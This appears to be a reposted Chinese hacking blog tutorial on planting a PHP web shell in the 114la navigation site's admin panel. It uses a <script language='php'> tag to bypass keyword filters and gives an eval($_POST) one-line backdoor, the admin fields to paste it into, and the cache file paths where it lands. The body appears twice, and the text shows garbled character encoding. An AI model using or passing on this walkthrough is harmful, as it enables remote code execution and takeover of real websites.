php后臺(tái)插一句話后門的思路分享
發(fā)布時(shí)間:2011-09-29 22:52:53 作者:佚名
我要評(píng)論

php后臺(tái)插一句話的思路加114網(wǎng)址導(dǎo)航后臺(tái)拿webshell的方法。
首先介紹下php的各種標(biāo)簽:
1):
<?php ?>
demo:
<?php echo "test";?>
這個(gè)標(biāo)簽現(xiàn)在程序大多都是使用的這種標(biāo)簽!大家都不陌生了,這里就不多介紹了!
2):
<? echo "test"; ?>
這種標(biāo)簽是在以前很普遍的一種用法php 老版本開發(fā)的cms大多都是用的它,
大多程序員都是很熟悉的!我們把這種標(biāo)簽稱為短語標(biāo)簽!
3):
<script language="php"> </script>
demo:
<script language="php">echo "test";</script>
這個(gè)標(biāo)簽是今天的重點(diǎn),大多都不熟悉的!而且程序員在網(wǎng)站后臺(tái)過濾插一句話
的時(shí)候往往都是以
“<?,?>”
這兩個(gè)關(guān)鍵字進(jìn)行替換或過濾的!所以這種標(biāo)簽在后臺(tái)插馬
的時(shí)候用處還是很大的!PS:就是應(yīng)為使用量不大,就不重視!這樣能行嗎?
實(shí)戰(zhàn):114啦導(dǎo)航準(zhǔn)備我們的一句話代碼:利用script的標(biāo)簽代碼:
<script language="php">eval ($_POST[1]);</script>
首先后臺(tái)我跟晴天那家伙已經(jīng)看完了。他自己的方法也沒拿下shell模版目錄權(quán)限是只讀!你們懂的!
這里的方法就是利用緩存拿shell.這個(gè)方法是以前公布出來的。作者具體就不知道是誰了(轉(zhuǎn)載亂了)
–官方以及把這里修補(bǔ)了,但是修補(bǔ)方法很馬虎!就是我之前說的過濾關(guān)鍵字只有
<? ?>
所以這里我們可以利用 我們準(zhǔn)備好的script格式的php一句話代碼插入!
名站首行:
HTML內(nèi)輸入一句話,提交后一句話木馬位于admin/data/cache/cache_mztop.php
名站輪播:
站點(diǎn)網(wǎng)址后輸入一句話,提交后一句話木馬位于admin/data/cache/cache_famous_loop.php
名站切換:
ifreme網(wǎng)址后輸入一句話,提交后一句話木馬位于admin/data/cache/cache_famous_tab.php
首頁實(shí)用工具:
工具網(wǎng)址后輸入一句話,提交后一句話木馬位于admin/data/cache/cache_index_tool.php
本文來源于:半坑土農(nóng)民'S Blog
1):
<?php ?>
demo:
<?php echo "test";?>
這個(gè)標(biāo)簽現(xiàn)在程序大多都是使用的這種標(biāo)簽!大家都不陌生了,這里就不多介紹了!
2):
<? echo "test"; ?>
這種標(biāo)簽是在以前很普遍的一種用法php 老版本開發(fā)的cms大多都是用的它,
大多程序員都是很熟悉的!我們把這種標(biāo)簽稱為短語標(biāo)簽!
3):
<script language="php"> </script>
demo:
<script language="php">echo "test";</script>
這個(gè)標(biāo)簽是今天的重點(diǎn),大多都不熟悉的!而且程序員在網(wǎng)站后臺(tái)過濾插一句話
的時(shí)候往往都是以
“<?,?>”
這兩個(gè)關(guān)鍵字進(jìn)行替換或過濾的!所以這種標(biāo)簽在后臺(tái)插馬
的時(shí)候用處還是很大的!PS:就是應(yīng)為使用量不大,就不重視!這樣能行嗎?
實(shí)戰(zhàn):114啦導(dǎo)航準(zhǔn)備我們的一句話代碼:利用script的標(biāo)簽代碼:
<script language="php">eval ($_POST[1]);</script>
首先后臺(tái)我跟晴天那家伙已經(jīng)看完了。他自己的方法也沒拿下shell模版目錄權(quán)限是只讀!你們懂的!
這里的方法就是利用緩存拿shell.這個(gè)方法是以前公布出來的。作者具體就不知道是誰了(轉(zhuǎn)載亂了)
–官方以及把這里修補(bǔ)了,但是修補(bǔ)方法很馬虎!就是我之前說的過濾關(guān)鍵字只有
<? ?>
所以這里我們可以利用 我們準(zhǔn)備好的script格式的php一句話代碼插入!
名站首行:
HTML內(nèi)輸入一句話,提交后一句話木馬位于admin/data/cache/cache_mztop.php
名站輪播:
站點(diǎn)網(wǎng)址后輸入一句話,提交后一句話木馬位于admin/data/cache/cache_famous_loop.php
名站切換:
ifreme網(wǎng)址后輸入一句話,提交后一句話木馬位于admin/data/cache/cache_famous_tab.php
首頁實(shí)用工具:
工具網(wǎng)址后輸入一句話,提交后一句話木馬位于admin/data/cache/cache_index_tool.php
本文來源于:半坑土農(nóng)民'S Blog
相關(guān)文章
- 最近看到網(wǎng)上曝出的dedecms最新版本的一個(gè)注入漏洞利用,漏洞PoC和分析文章也已在網(wǎng)上公開.但是在我實(shí)際測試過程當(dāng)中,發(fā)現(xiàn)無法復(fù)現(xiàn)2013-06-11
- 春節(jié)呆在家里上網(wǎng),我表哥突然找我說要一個(gè)DJ網(wǎng)站的VIP會(huì)員,說搞定后請(qǐng)我吃KFC,于是就答應(yīng)了。2011-03-22
DEDECMS 爆嚴(yán)重安全漏洞 免賬號(hào)密碼直接進(jìn)入后臺(tái)
眾所周知,因使用簡單、客戶群多,織夢CMS一直被爆出許多漏洞。今天小編在群里得到織夢官方論壇某版主可靠消息:DEDECMS爆嚴(yán)重安全漏洞,近期官方會(huì)發(fā)布相關(guān)補(bǔ)丁,望大家及2011-08-20- 腳本入侵-ASP網(wǎng)站入侵一些技巧 先說明下 先看下是不是html轉(zhuǎn)的asp生成的站2011-04-24
Linux系統(tǒng)采用netstat命令查看DDOS攻擊的方法
這篇文章主要為大家介紹了Linux系統(tǒng)采用netstat命令查看DDOS攻擊的方法,對(duì)于網(wǎng)絡(luò)安全而言非常重要!需要的朋友可以參考下2014-07-05訊時(shí)系統(tǒng)(xuas)最新通殺漏洞0day圖文說明
訊時(shí)系統(tǒng)(xuas)最新通殺漏洞0day圖文說明,使用訊時(shí)網(wǎng)站管理系統(tǒng)的朋友可以參考下。2011-07-15- 手工注入方法,方便大家測試程序漏洞,本人只供學(xué)習(xí)交流,不建議搞破壞。2011-11-03
phpcms2008 代碼執(zhí)行 批量getshell EXP(使用菜刀)
這篇文章主要介紹了phpcms2008 代碼執(zhí)行 批量getshell EXP的相關(guān)資料,需要的朋友可以參考下2014-05-09- 腳本入侵-上傳漏洞總結(jié)篇(臭小子),從事于網(wǎng)站開發(fā)的程序員要看下,不要讓自己的程序別黑客利用。2011-04-24
- DDos攻擊是現(xiàn)在大部分用戶最喜歡的一個(gè)話題,近兩年來發(fā)展態(tài)勢也漸趨平緩,歐洲反垃圾郵件組織Spamhaus突然遭受到高達(dá)300Gbps的大流量DDos攻擊被認(rèn)為是史上最大DDoS攻擊,2016-09-20